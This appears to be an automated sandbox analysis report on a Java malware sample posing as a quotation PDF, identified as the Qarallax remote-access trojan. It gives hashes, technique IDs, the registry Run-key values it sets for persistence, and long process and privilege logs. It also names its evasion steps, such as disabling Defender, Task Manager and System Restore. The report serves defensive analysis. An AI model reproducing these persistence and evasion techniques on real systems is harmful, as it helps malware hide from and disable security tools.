qarallax | bec1e9a4fe86006e3e32848e8b2a8db1c9e6505fe4b6a37d4d9a25e9e0a7cb8c

Analysis

max time kernel
148s
max time network
147s
platform
windows10_x64
resource
win10v200722
submitted
18-08-2020 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
Size

411KB
MD5

f29f8a490d27bb40bfc0bc597afb8afb
SHA1

34c8a7efcbffebada0711cbf8a31822f4de0ca9c
SHA256

bec1e9a4fe86006e3e32848e8b2a8db1c9e6505fe4b6a37d4d9a25e9e0a7cb8c
SHA512

9010f364fdcf603e68e5b97a4429f480903ed5978d7e61a383f6246cbac6e07d9bc584634481478a1e4eca60869e663e62b95d34d9875ef6e977f8ba119bb72d

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000200000001a663-67.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
424	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\phTZg	java.exe
File opened for modification	C:\Windows\System32\phTZg	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
724	taskkill.exe
4912	taskkill.exe
3516	taskkill.exe
4652	taskkill.exe
1804	taskkill.exe
4092	taskkill.exe
3884	taskkill.exe
4636	taskkill.exe
3028	taskkill.exe
4668	taskkill.exe
4272	taskkill.exe
4204	taskkill.exe
4936	taskkill.exe
2516	taskkill.exe
4900	taskkill.exe
4240	taskkill.exe
3836	taskkill.exe
4768	taskkill.exe
3348	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
424	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3808	WMIC.exe
Token: SeSecurityPrivilege	3808	WMIC.exe
Token: SeTakeOwnershipPrivilege	3808	WMIC.exe
Token: SeLoadDriverPrivilege	3808	WMIC.exe
Token: SeSystemProfilePrivilege	3808	WMIC.exe
Token: SeSystemtimePrivilege	3808	WMIC.exe
Token: SeProfSingleProcessPrivilege	3808	WMIC.exe
Token: SeIncBasePriorityPrivilege	3808	WMIC.exe
Token: SeCreatePagefilePrivilege	3808	WMIC.exe
Token: SeBackupPrivilege	3808	WMIC.exe
Token: SeRestorePrivilege	3808	WMIC.exe
Token: SeShutdownPrivilege	3808	WMIC.exe
Token: SeDebugPrivilege	3808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3808	WMIC.exe
Token: SeRemoteShutdownPrivilege	3808	WMIC.exe
Token: SeUndockPrivilege	3808	WMIC.exe
Token: SeManageVolumePrivilege	3808	WMIC.exe
Token: 33	3808	WMIC.exe
Token: 34	3808	WMIC.exe
Token: 35	3808	WMIC.exe
Token: 36	3808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3808	WMIC.exe
Token: SeSecurityPrivilege	3808	WMIC.exe
Token: SeTakeOwnershipPrivilege	3808	WMIC.exe
Token: SeLoadDriverPrivilege	3808	WMIC.exe
Token: SeSystemProfilePrivilege	3808	WMIC.exe
Token: SeSystemtimePrivilege	3808	WMIC.exe
Token: SeProfSingleProcessPrivilege	3808	WMIC.exe
Token: SeIncBasePriorityPrivilege	3808	WMIC.exe
Token: SeCreatePagefilePrivilege	3808	WMIC.exe
Token: SeBackupPrivilege	3808	WMIC.exe
Token: SeRestorePrivilege	3808	WMIC.exe
Token: SeShutdownPrivilege	3808	WMIC.exe
Token: SeDebugPrivilege	3808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3808	WMIC.exe
Token: SeRemoteShutdownPrivilege	3808	WMIC.exe
Token: SeUndockPrivilege	3808	WMIC.exe
Token: SeManageVolumePrivilege	3808	WMIC.exe
Token: 33	3808	WMIC.exe
Token: 34	3808	WMIC.exe
Token: 35	3808	WMIC.exe
Token: 36	3808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3984	WMIC.exe
Token: SeSecurityPrivilege	3984	WMIC.exe
Token: SeTakeOwnershipPrivilege	3984	WMIC.exe
Token: SeLoadDriverPrivilege	3984	WMIC.exe
Token: SeSystemProfilePrivilege	3984	WMIC.exe
Token: SeSystemtimePrivilege	3984	WMIC.exe
Token: SeProfSingleProcessPrivilege	3984	WMIC.exe
Token: SeIncBasePriorityPrivilege	3984	WMIC.exe
Token: SeCreatePagefilePrivilege	3984	WMIC.exe
Token: SeBackupPrivilege	3984	WMIC.exe
Token: SeRestorePrivilege	3984	WMIC.exe
Token: SeShutdownPrivilege	3984	WMIC.exe
Token: SeDebugPrivilege	3984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3984	WMIC.exe
Token: SeRemoteShutdownPrivilege	3984	WMIC.exe
Token: SeUndockPrivilege	3984	WMIC.exe
Token: SeManageVolumePrivilege	3984	WMIC.exe
Token: 33	3984	WMIC.exe
Token: 34	3984	WMIC.exe
Token: 35	3984	WMIC.exe
Token: 36	3984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3984	WMIC.exe
Token: SeSecurityPrivilege	3984	WMIC.exe
Token: SeTakeOwnershipPrivilege	3984	WMIC.exe
Token: SeLoadDriverPrivilege	3984	WMIC.exe
Token: SeSystemProfilePrivilege	3984	WMIC.exe
Token: SeSystemtimePrivilege	3984	WMIC.exe
Token: SeProfSingleProcessPrivilege	3984	WMIC.exe
Token: SeIncBasePriorityPrivilege	3984	WMIC.exe
Token: SeCreatePagefilePrivilege	3984	WMIC.exe
Token: SeBackupPrivilege	3984	WMIC.exe
Token: SeRestorePrivilege	3984	WMIC.exe
Token: SeShutdownPrivilege	3984	WMIC.exe
Token: SeDebugPrivilege	3984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3984	WMIC.exe
Token: SeRemoteShutdownPrivilege	3984	WMIC.exe
Token: SeUndockPrivilege	3984	WMIC.exe
Token: SeManageVolumePrivilege	3984	WMIC.exe
Token: 33	3984	WMIC.exe
Token: 34	3984	WMIC.exe
Token: 35	3984	WMIC.exe
Token: 36	3984	WMIC.exe
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	3836	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	4668	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
424	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 424 wrote to memory of 3516	424	java.exe	70
PID 424 wrote to memory of 3516	424	java.exe	70
PID 424 wrote to memory of 4044	424	java.exe	72
PID 424 wrote to memory of 4044	424	java.exe	72
PID 4044 wrote to memory of 3808	4044	cmd.exe	74
PID 4044 wrote to memory of 3808	4044	cmd.exe	74
PID 424 wrote to memory of 2684	424	java.exe	75
PID 424 wrote to memory of 2684	424	java.exe	75
PID 2684 wrote to memory of 3984	2684	cmd.exe	77
PID 2684 wrote to memory of 3984	2684	cmd.exe	77
PID 424 wrote to memory of 3640	424	java.exe	78
PID 424 wrote to memory of 3640	424	java.exe	78
PID 424 wrote to memory of 612	424	java.exe	80
PID 424 wrote to memory of 612	424	java.exe	80
PID 424 wrote to memory of 2208	424	java.exe	85
PID 424 wrote to memory of 2208	424	java.exe	85
PID 424 wrote to memory of 3972	424	java.exe	86
PID 424 wrote to memory of 3972	424	java.exe	86
PID 424 wrote to memory of 3912	424	java.exe	89
PID 424 wrote to memory of 3912	424	java.exe	89
PID 424 wrote to memory of 3276	424	java.exe	91
PID 424 wrote to memory of 3276	424	java.exe	91
PID 424 wrote to memory of 4020	424	java.exe	93
PID 424 wrote to memory of 4020	424	java.exe	93
PID 424 wrote to memory of 1908	424	java.exe	95
PID 424 wrote to memory of 1908	424	java.exe	95
PID 424 wrote to memory of 3524	424	java.exe	97
PID 424 wrote to memory of 3524	424	java.exe	97
PID 424 wrote to memory of 3832	424	java.exe	99
PID 424 wrote to memory of 3832	424	java.exe	99
PID 424 wrote to memory of 724	424	java.exe	100
PID 424 wrote to memory of 724	424	java.exe	100
PID 424 wrote to memory of 1620	424	java.exe	101
PID 424 wrote to memory of 1620	424	java.exe	101
PID 424 wrote to memory of 3848	424	java.exe	102
PID 424 wrote to memory of 3848	424	java.exe	102
PID 424 wrote to memory of 1796	424	java.exe	106
PID 424 wrote to memory of 1796	424	java.exe	106
PID 424 wrote to memory of 1992	424	java.exe	109
PID 424 wrote to memory of 1992	424	java.exe	109
PID 424 wrote to memory of 1996	424	java.exe	110
PID 424 wrote to memory of 1996	424	java.exe	110
PID 424 wrote to memory of 3720	424	java.exe	113
PID 424 wrote to memory of 3720	424	java.exe	113
PID 424 wrote to memory of 3716	424	java.exe	114
PID 424 wrote to memory of 3716	424	java.exe	114
PID 424 wrote to memory of 3884	424	java.exe	117
PID 424 wrote to memory of 3884	424	java.exe	117
PID 424 wrote to memory of 3808	424	java.exe	118
PID 424 wrote to memory of 3808	424	java.exe	118
PID 3524 wrote to memory of 2580	3524	cmd.exe	119
PID 3524 wrote to memory of 2580	3524	cmd.exe	119
PID 424 wrote to memory of 2792	424	java.exe	122
PID 424 wrote to memory of 2792	424	java.exe	122
PID 424 wrote to memory of 3104	424	java.exe	123
PID 424 wrote to memory of 3104	424	java.exe	123
PID 424 wrote to memory of 4036	424	java.exe	125
PID 424 wrote to memory of 4036	424	java.exe	125
PID 424 wrote to memory of 3544	424	java.exe	127
PID 424 wrote to memory of 3544	424	java.exe	127
PID 424 wrote to memory of 4120	424	java.exe	130
PID 424 wrote to memory of 4120	424	java.exe	130
PID 424 wrote to memory of 4132	424	java.exe	131
PID 424 wrote to memory of 4132	424	java.exe	131
PID 424 wrote to memory of 4240	424	java.exe	134
PID 424 wrote to memory of 4240	424	java.exe	134
PID 424 wrote to memory of 4276	424	java.exe	135
PID 424 wrote to memory of 4276	424	java.exe	135
PID 424 wrote to memory of 4312	424	java.exe	137
PID 424 wrote to memory of 4312	424	java.exe	137
PID 424 wrote to memory of 4432	424	java.exe	141
PID 424 wrote to memory of 4432	424	java.exe	141
PID 424 wrote to memory of 4452	424	java.exe	142
PID 424 wrote to memory of 4452	424	java.exe	142
PID 424 wrote to memory of 4544	424	java.exe	145
PID 424 wrote to memory of 4544	424	java.exe	145
PID 424 wrote to memory of 4556	424	java.exe	146
PID 424 wrote to memory of 4556	424	java.exe	146
PID 424 wrote to memory of 4652	424	java.exe	149
PID 424 wrote to memory of 4652	424	java.exe	149
PID 424 wrote to memory of 4664	424	java.exe	150
PID 424 wrote to memory of 4664	424	java.exe	150
PID 3524 wrote to memory of 4708	3524	cmd.exe	151
PID 3524 wrote to memory of 4708	3524	cmd.exe	151
PID 424 wrote to memory of 4780	424	java.exe	154
PID 424 wrote to memory of 4780	424	java.exe	154
PID 424 wrote to memory of 4788	424	java.exe	155
PID 424 wrote to memory of 4788	424	java.exe	155
PID 424 wrote to memory of 4884	424	java.exe	158
PID 424 wrote to memory of 4884	424	java.exe	158
PID 424 wrote to memory of 4896	424	java.exe	159
PID 424 wrote to memory of 4896	424	java.exe	159
PID 424 wrote to memory of 5008	424	java.exe	162
PID 424 wrote to memory of 5008	424	java.exe	162
PID 424 wrote to memory of 5080	424	java.exe	164
PID 424 wrote to memory of 5080	424	java.exe	164
PID 424 wrote to memory of 4092	424	java.exe	166
PID 424 wrote to memory of 4092	424	java.exe	166
PID 424 wrote to memory of 700	424	java.exe	167
PID 424 wrote to memory of 700	424	java.exe	167
PID 424 wrote to memory of 2896	424	java.exe	170
PID 424 wrote to memory of 2896	424	java.exe	170
PID 424 wrote to memory of 4128	424	java.exe	172
PID 424 wrote to memory of 4128	424	java.exe	172
PID 424 wrote to memory of 4016	424	java.exe	174
PID 424 wrote to memory of 4016	424	java.exe	174
PID 4016 wrote to memory of 4248	4016	cmd.exe	176
PID 4016 wrote to memory of 4248	4016	cmd.exe	176
PID 4016 wrote to memory of 336	4016	cmd.exe	177
PID 4016 wrote to memory of 336	4016	cmd.exe	177
PID 424 wrote to memory of 1048	424	java.exe	178
PID 424 wrote to memory of 1048	424	java.exe	178
PID 424 wrote to memory of 4204	424	java.exe	180
PID 424 wrote to memory of 4204	424	java.exe	180
PID 1048 wrote to memory of 4324	1048	cmd.exe	182
PID 1048 wrote to memory of 4324	1048	cmd.exe	182
PID 1048 wrote to memory of 4508	1048	cmd.exe	183
PID 1048 wrote to memory of 4508	1048	cmd.exe	183
PID 424 wrote to memory of 4412	424	java.exe	184
PID 424 wrote to memory of 4412	424	java.exe	184
PID 4412 wrote to memory of 4228	4412	cmd.exe	186
PID 4412 wrote to memory of 4228	4412	cmd.exe	186
PID 4412 wrote to memory of 4136	4412	cmd.exe	187
PID 4412 wrote to memory of 4136	4412	cmd.exe	187
PID 424 wrote to memory of 4232	424	java.exe	188
PID 424 wrote to memory of 4232	424	java.exe	188
PID 4232 wrote to memory of 4524	4232	cmd.exe	190
PID 4232 wrote to memory of 4524	4232	cmd.exe	190
PID 4232 wrote to memory of 4760	4232	cmd.exe	191
PID 4232 wrote to memory of 4760	4232	cmd.exe	191
PID 424 wrote to memory of 4120	424	java.exe	192
PID 424 wrote to memory of 4120	424	java.exe	192
PID 4120 wrote to memory of 4216	4120	cmd.exe	194
PID 4120 wrote to memory of 4216	4120	cmd.exe	194
PID 4120 wrote to memory of 4868	4120	cmd.exe	195
PID 4120 wrote to memory of 4868	4120	cmd.exe	195
PID 424 wrote to memory of 2140	424	java.exe	196
PID 424 wrote to memory of 2140	424	java.exe	196
PID 2140 wrote to memory of 4276	2140	cmd.exe	198
PID 2140 wrote to memory of 4276	2140	cmd.exe	198
PID 424 wrote to memory of 4936	424	java.exe	199
PID 424 wrote to memory of 4936	424	java.exe	199
PID 2140 wrote to memory of 4872	2140	cmd.exe	201
PID 2140 wrote to memory of 4872	2140	cmd.exe	201
PID 424 wrote to memory of 4572	424	java.exe	202
PID 424 wrote to memory of 4572	424	java.exe	202
PID 4572 wrote to memory of 4600	4572	cmd.exe	204
PID 4572 wrote to memory of 4600	4572	cmd.exe	204
PID 4572 wrote to memory of 4512	4572	cmd.exe	205
PID 4572 wrote to memory of 4512	4572	cmd.exe	205
PID 424 wrote to memory of 4540	424	java.exe	206
PID 424 wrote to memory of 4540	424	java.exe	206
PID 4540 wrote to memory of 4616	4540	cmd.exe	208
PID 4540 wrote to memory of 4616	4540	cmd.exe	208
PID 4540 wrote to memory of 4592	4540	cmd.exe	209
PID 4540 wrote to memory of 4592	4540	cmd.exe	209
PID 424 wrote to memory of 4776	424	java.exe	210
PID 424 wrote to memory of 4776	424	java.exe	210
PID 4776 wrote to memory of 4824	4776	cmd.exe	212
PID 4776 wrote to memory of 4824	4776	cmd.exe	212
PID 4776 wrote to memory of 5016	4776	cmd.exe	213
PID 4776 wrote to memory of 5016	4776	cmd.exe	213
PID 424 wrote to memory of 3644	424	java.exe	214
PID 424 wrote to memory of 3644	424	java.exe	214
PID 3644 wrote to memory of 4932	3644	cmd.exe	216
PID 3644 wrote to memory of 4932	3644	cmd.exe	216
PID 3644 wrote to memory of 4900	3644	cmd.exe	217
PID 3644 wrote to memory of 4900	3644	cmd.exe	217
PID 424 wrote to memory of 4832	424	java.exe	218
PID 424 wrote to memory of 4832	424	java.exe	218
PID 4832 wrote to memory of 4888	4832	cmd.exe	220
PID 4832 wrote to memory of 4888	4832	cmd.exe	220
PID 4832 wrote to memory of 5036	4832	cmd.exe	221
PID 4832 wrote to memory of 5036	4832	cmd.exe	221
PID 424 wrote to memory of 4996	424	java.exe	222
PID 424 wrote to memory of 4996	424	java.exe	222
PID 4996 wrote to memory of 4676	4996	cmd.exe	224
PID 4996 wrote to memory of 4676	4996	cmd.exe	224
PID 4996 wrote to memory of 5052	4996	cmd.exe	225
PID 4996 wrote to memory of 5052	4996	cmd.exe	225
PID 424 wrote to memory of 4912	424	java.exe	226
PID 424 wrote to memory of 4912	424	java.exe	226
PID 424 wrote to memory of 4884	424	java.exe	228
PID 424 wrote to memory of 4884	424	java.exe	228
PID 4884 wrote to memory of 4336	4884	cmd.exe	230
PID 4884 wrote to memory of 4336	4884	cmd.exe	230
PID 4884 wrote to memory of 5056	4884	cmd.exe	231
PID 4884 wrote to memory of 5056	4884	cmd.exe	231
PID 424 wrote to memory of 1292	424	java.exe	232
PID 424 wrote to memory of 1292	424	java.exe	232
PID 1292 wrote to memory of 3828	1292	cmd.exe	234
PID 1292 wrote to memory of 3828	1292	cmd.exe	234
PID 1292 wrote to memory of 3648	1292	cmd.exe	235
PID 1292 wrote to memory of 3648	1292	cmd.exe	235
PID 424 wrote to memory of 3288	424	java.exe	236
PID 424 wrote to memory of 3288	424	java.exe	236
PID 3288 wrote to memory of 2312	3288	cmd.exe	238
PID 3288 wrote to memory of 2312	3288	cmd.exe	238
PID 3288 wrote to memory of 4192	3288	cmd.exe	239
PID 3288 wrote to memory of 4192	3288	cmd.exe	239
PID 424 wrote to memory of 852	424	java.exe	240
PID 424 wrote to memory of 852	424	java.exe	240
PID 852 wrote to memory of 4056	852	cmd.exe	242
PID 852 wrote to memory of 4056	852	cmd.exe	242
PID 852 wrote to memory of 3816	852	cmd.exe	243
PID 852 wrote to memory of 3816	852	cmd.exe	243
PID 424 wrote to memory of 4160	424	java.exe	244
PID 424 wrote to memory of 4160	424	java.exe	244
PID 4160 wrote to memory of 3092	4160	cmd.exe	246
PID 4160 wrote to memory of 3092	4160	cmd.exe	246
PID 4160 wrote to memory of 2792	4160	cmd.exe	247
PID 4160 wrote to memory of 2792	4160	cmd.exe	247
PID 424 wrote to memory of 3976	424	java.exe	248
PID 424 wrote to memory of 3976	424	java.exe	248
PID 424 wrote to memory of 2516	424	java.exe	249
PID 424 wrote to memory of 2516	424	java.exe	249
PID 3976 wrote to memory of 2044	3976	cmd.exe	252
PID 3976 wrote to memory of 2044	3976	cmd.exe	252
PID 3976 wrote to memory of 4036	3976	cmd.exe	253
PID 3976 wrote to memory of 4036	3976	cmd.exe	253
PID 424 wrote to memory of 2524	424	java.exe	254
PID 424 wrote to memory of 2524	424	java.exe	254
PID 2524 wrote to memory of 4524	2524	cmd.exe	256
PID 2524 wrote to memory of 4524	2524	cmd.exe	256
PID 2524 wrote to memory of 4188	2524	cmd.exe	257
PID 2524 wrote to memory of 4188	2524	cmd.exe	257
PID 424 wrote to memory of 4728	424	java.exe	258
PID 424 wrote to memory of 4728	424	java.exe	258
PID 4728 wrote to memory of 3032	4728	cmd.exe	260
PID 4728 wrote to memory of 3032	4728	cmd.exe	260
PID 4728 wrote to memory of 4416	4728	cmd.exe	261
PID 4728 wrote to memory of 4416	4728	cmd.exe	261
PID 424 wrote to memory of 4576	424	java.exe	262
PID 424 wrote to memory of 4576	424	java.exe	262
PID 4576 wrote to memory of 4412	4576	cmd.exe	264
PID 4576 wrote to memory of 4412	4576	cmd.exe	264
PID 4576 wrote to memory of 4120	4576	cmd.exe	265
PID 4576 wrote to memory of 4120	4576	cmd.exe	265
PID 424 wrote to memory of 4208	424	java.exe	266
PID 424 wrote to memory of 4208	424	java.exe	266
PID 4208 wrote to memory of 4380	4208	cmd.exe	268
PID 4208 wrote to memory of 4380	4208	cmd.exe	268
PID 4208 wrote to memory of 4420	4208	cmd.exe	269
PID 4208 wrote to memory of 4420	4208	cmd.exe	269
PID 424 wrote to memory of 4548	424	java.exe	270
PID 424 wrote to memory of 4548	424	java.exe	270
PID 4548 wrote to memory of 5044	4548	cmd.exe	272
PID 4548 wrote to memory of 5044	4548	cmd.exe	272
PID 4548 wrote to memory of 4476	4548	cmd.exe	274
PID 4548 wrote to memory of 4476	4548	cmd.exe	274
PID 424 wrote to memory of 4928	424	java.exe	275
PID 424 wrote to memory of 4928	424	java.exe	275
PID 4928 wrote to memory of 4504	4928	cmd.exe	277
PID 4928 wrote to memory of 4504	4928	cmd.exe	277
PID 4928 wrote to memory of 4952	4928	cmd.exe	278
PID 4928 wrote to memory of 4952	4928	cmd.exe	278
PID 424 wrote to memory of 3108	424	java.exe	279
PID 424 wrote to memory of 3108	424	java.exe	279
PID 3108 wrote to memory of 4852	3108	cmd.exe	281
PID 3108 wrote to memory of 4852	3108	cmd.exe	281
PID 424 wrote to memory of 4900	424	java.exe	282
PID 424 wrote to memory of 4900	424	java.exe	282
PID 3108 wrote to memory of 4896	3108	cmd.exe	284
PID 3108 wrote to memory of 4896	3108	cmd.exe	284
PID 424 wrote to memory of 1000	424	java.exe	285
PID 424 wrote to memory of 1000	424	java.exe	285
PID 1000 wrote to memory of 5040	1000	cmd.exe	287
PID 1000 wrote to memory of 5040	1000	cmd.exe	287
PID 1000 wrote to memory of 5084	1000	cmd.exe	288
PID 1000 wrote to memory of 5084	1000	cmd.exe	288
PID 424 wrote to memory of 4116	424	java.exe	289
PID 424 wrote to memory of 4116	424	java.exe	289
PID 4116 wrote to memory of 4912	4116	cmd.exe	291
PID 4116 wrote to memory of 4912	4116	cmd.exe	291
PID 4116 wrote to memory of 700	4116	cmd.exe	292
PID 4116 wrote to memory of 700	4116	cmd.exe	292
PID 424 wrote to memory of 3640	424	java.exe	293
PID 424 wrote to memory of 3640	424	java.exe	293
PID 3640 wrote to memory of 4860	3640	cmd.exe	295
PID 3640 wrote to memory of 4860	3640	cmd.exe	295
PID 3640 wrote to memory of 4144	3640	cmd.exe	296
PID 3640 wrote to memory of 4144	3640	cmd.exe	296
PID 424 wrote to memory of 3520	424	java.exe	297
PID 424 wrote to memory of 3520	424	java.exe	297
PID 3520 wrote to memory of 4164	3520	cmd.exe	299
PID 3520 wrote to memory of 4164	3520	cmd.exe	299
PID 3520 wrote to memory of 4256	3520	cmd.exe	300
PID 3520 wrote to memory of 4256	3520	cmd.exe	300
PID 424 wrote to memory of 336	424	java.exe	301
PID 424 wrote to memory of 336	424	java.exe	301
PID 336 wrote to memory of 4488	336	cmd.exe	303
PID 336 wrote to memory of 4488	336	cmd.exe	303
PID 336 wrote to memory of 4596	336	cmd.exe	304
PID 336 wrote to memory of 4596	336	cmd.exe	304
PID 424 wrote to memory of 4148	424	java.exe	305
PID 424 wrote to memory of 4148	424	java.exe	305
PID 424 wrote to memory of 3884	424	java.exe	306
PID 424 wrote to memory of 3884	424	java.exe	306
PID 4148 wrote to memory of 4564	4148	cmd.exe	309
PID 4148 wrote to memory of 4564	4148	cmd.exe	309
PID 4148 wrote to memory of 4372	4148	cmd.exe	310
PID 4148 wrote to memory of 4372	4148	cmd.exe	310
PID 424 wrote to memory of 4232	424	java.exe	311
PID 424 wrote to memory of 4232	424	java.exe	311
PID 4232 wrote to memory of 4120	4232	cmd.exe	313
PID 4232 wrote to memory of 4120	4232	cmd.exe	313
PID 4232 wrote to memory of 1120	4232	cmd.exe	314
PID 4232 wrote to memory of 1120	4232	cmd.exe	314
PID 424 wrote to memory of 4496	424	java.exe	315
PID 424 wrote to memory of 4496	424	java.exe	315
PID 4496 wrote to memory of 4396	4496	cmd.exe	317
PID 4496 wrote to memory of 4396	4496	cmd.exe	317
PID 4496 wrote to memory of 4976	4496	cmd.exe	318
PID 4496 wrote to memory of 4976	4496	cmd.exe	318
PID 424 wrote to memory of 4592	424	java.exe	319
PID 424 wrote to memory of 4592	424	java.exe	319
PID 4592 wrote to memory of 4688	4592	cmd.exe	321
PID 4592 wrote to memory of 4688	4592	cmd.exe	321
PID 4592 wrote to memory of 4664	4592	cmd.exe	322
PID 4592 wrote to memory of 4664	4592	cmd.exe	322
PID 424 wrote to memory of 5076	424	java.exe	323
PID 424 wrote to memory of 5076	424	java.exe	323
PID 5076 wrote to memory of 4652	5076	cmd.exe	325
PID 5076 wrote to memory of 4652	5076	cmd.exe	325
PID 5076 wrote to memory of 4964	5076	cmd.exe	326
PID 5076 wrote to memory of 4964	5076	cmd.exe	326
PID 424 wrote to memory of 4228	424	java.exe	327
PID 424 wrote to memory of 4228	424	java.exe	327
PID 4228 wrote to memory of 4344	4228	cmd.exe	329
PID 4228 wrote to memory of 4344	4228	cmd.exe	329
PID 4228 wrote to memory of 4668	4228	cmd.exe	330
PID 4228 wrote to memory of 4668	4228	cmd.exe	330
PID 424 wrote to memory of 4988	424	java.exe	331
PID 424 wrote to memory of 4988	424	java.exe	331
PID 4988 wrote to memory of 5080	4988	cmd.exe	333
PID 4988 wrote to memory of 5080	4988	cmd.exe	333
PID 4988 wrote to memory of 4124	4988	cmd.exe	334
PID 4988 wrote to memory of 4124	4988	cmd.exe	334
PID 424 wrote to memory of 2116	424	java.exe	335
PID 424 wrote to memory of 2116	424	java.exe	335
PID 2116 wrote to memory of 5024	2116	cmd.exe	337
PID 2116 wrote to memory of 5024	2116	cmd.exe	337
PID 2116 wrote to memory of 4432	2116	cmd.exe	338
PID 2116 wrote to memory of 4432	2116	cmd.exe	338
PID 424 wrote to memory of 3924	424	java.exe	339
PID 424 wrote to memory of 3924	424	java.exe	339
PID 3924 wrote to memory of 852	3924	cmd.exe	341
PID 3924 wrote to memory of 852	3924	cmd.exe	341
PID 3924 wrote to memory of 4052	3924	cmd.exe	342
PID 3924 wrote to memory of 4052	3924	cmd.exe	342
PID 424 wrote to memory of 4548	424	java.exe	343
PID 424 wrote to memory of 4548	424	java.exe	343
PID 4548 wrote to memory of 4928	4548	cmd.exe	345
PID 4548 wrote to memory of 4928	4548	cmd.exe	345
PID 4548 wrote to memory of 4160	4548	cmd.exe	346
PID 4548 wrote to memory of 4160	4548	cmd.exe	346
PID 424 wrote to memory of 4940	424	java.exe	347
PID 424 wrote to memory of 4940	424	java.exe	347
PID 4940 wrote to memory of 4048	4940	cmd.exe	349
PID 4940 wrote to memory of 4048	4940	cmd.exe	349
PID 4940 wrote to memory of 4544	4940	cmd.exe	350
PID 4940 wrote to memory of 4544	4940	cmd.exe	350
PID 424 wrote to memory of 3440	424	java.exe	351
PID 424 wrote to memory of 3440	424	java.exe	351
PID 3440 wrote to memory of 1440	3440	cmd.exe	353
PID 3440 wrote to memory of 1440	3440	cmd.exe	353
PID 3440 wrote to memory of 3752	3440	cmd.exe	354
